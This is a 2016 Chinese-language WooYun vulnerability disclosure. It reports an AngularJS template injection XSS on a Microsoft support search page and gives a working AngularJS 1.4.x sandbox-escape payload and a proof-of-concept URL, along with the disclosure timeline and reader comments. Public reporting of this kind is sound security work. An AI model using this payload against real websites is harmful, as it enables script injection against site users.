microsoft.com某站点AngularJS模板标签注入漏洞

编号190247
Urlhttp://www.wooyun.org/bug.php?action=view&id=190247
漏洞状态已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞标题microsoft.com某站点AngularJS模板标签注入漏洞
漏洞类型XSS跨站脚本攻击
厂商microsoft.com
白帽子lijiejie
提交日期2016-03-29 11:00:00
公开日期2016-05-16 16:30:00
修复时间(not set)
确认时间2016-04-01 00:00:00
Confirm Spend3
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank6
厂商评级
厂商评rank7
漏洞简介
microsoft.com某站点AngularJS模板标签注入,引入XSS漏洞。
Ref: http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
漏洞细节

AngularJS模板标签注入

http://**.**.**.**/en-us/support/search?query=aaa{{111%2b111}}bbb&xstart=8


**.**.**.**.png


如上图所示,angular JS版本是1.4.1

POC

1.4.0 - 1.4.9 Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}


poc:

http://**.**.**.**/en-us/support/search?query=aaa{{%27a%27.constructor.prototype.charAt=[].join;$eval(%27x=1}%20}%20};alert(%[email protected]%22)//%27);}}bbb&xstart=8


**.**.**.**.xss.png


最后再次感谢portswigger团队: http://**.**.**.**/2016/01/xss-without-html-client-side-template.html

修复方案

upgrade and apply xss filters

状态信息 2016-03-29: 细节已通知厂商并且等待厂商处理中
2016-04-01: 厂商已经确认,细节仅向厂商公开
2016-04-11: 细节向核心白帽子及相关领域专家公开
2016-04-21: 细节向普通白帽子公开
2016-05-01: 细节向实习白帽子公开
2016-05-16: 细节向公众公开
厂商回复CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。
回应信息危害等级:中漏洞Rank:7 确认时间:2016-04-01 16:21
Showing 1-8 of 8 items.
评论内容评论人点赞数评论时间

求姿势分享啊

Taro02016-03-30 10:30:00

牛逼!

range02016-03-29 19:16:00

lijiejie,求姿势

’‘Nome02016-03-29 13:24:00

前排

包包02016-03-29 12:14:00

6666

cwkiller02016-03-29 12:13:00

前排。。。

坏男孩-A_A02016-03-29 11:33:00

66666

随风的风02016-03-29 11:30:00

前排。。。

sysALong02016-03-29 11:23:00